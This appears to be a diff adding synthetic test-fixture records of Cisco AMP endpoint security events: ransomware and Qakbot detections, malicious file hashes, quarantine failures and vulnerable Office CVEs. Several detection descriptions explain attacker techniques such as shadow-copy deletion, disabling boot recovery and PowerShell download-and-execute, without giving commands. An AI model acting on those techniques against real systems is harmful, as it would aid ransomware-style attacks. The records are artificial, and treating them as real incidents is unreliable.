activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}}
